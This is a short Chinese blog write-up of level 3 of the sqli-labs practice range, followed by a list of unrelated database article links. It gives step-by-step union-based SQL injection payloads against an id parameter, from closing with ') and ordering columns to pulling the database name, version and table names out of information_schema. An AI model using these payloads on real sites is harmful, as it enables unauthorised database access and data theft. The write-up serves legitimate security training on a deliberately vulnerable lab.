web——sqliabs靶场——第三关

今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点

/?id=1'

有注入点

判断注入点类型

输入/?id=1') and 1=2 --+

3.判断它的字段数

/?id=1') order by 1-++

/?id=1') order by 2-++

/?id=1') order by 3-++

/?id=1') order by 4-++

爆出显示位

/?id=-1') union select 1,2,3 --+

开始判断库名

?id=-1') union select 1,database(),version() --+

判断表名

/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据

相关推荐
阳光_你好5 分钟前
详细说明Qt 中共享内存方法: QSharedMemory 对象
开发语言·数据库·qt
喝醉酒的小白1 小时前
MySQL响应慢是否由堵塞或死锁引起?
数据库
Pasregret1 小时前
04-深入解析 Spring 事务管理原理及源码
java·数据库·后端·spring·oracle
jnrjian1 小时前
归档重做日志archived log (明显) 比redo log重做日志文件小
数据库·oracle
TDengine (老段)2 小时前
TDengine 中的命名与边界
大数据·数据库·物联网·oracle·时序数据库·tdengine·iotdb
谁家有个大人2 小时前
MYSQL中对行与列的操作
数据库·mysql
0000ysl3 小时前
数据库基础-函数&约束
数据库
JavaPub-rodert3 小时前
Etcd用的是Raft算法
数据库·github·etcd·raft
编程乐趣3 小时前
FlexLabs.Upsert:EF Core插件推荐,支持多数据库的Upsert功能
数据库
dogplays3 小时前
dbeaver无法连接Oracle报错:ORA-17800、ORA-12514
数据库·oracle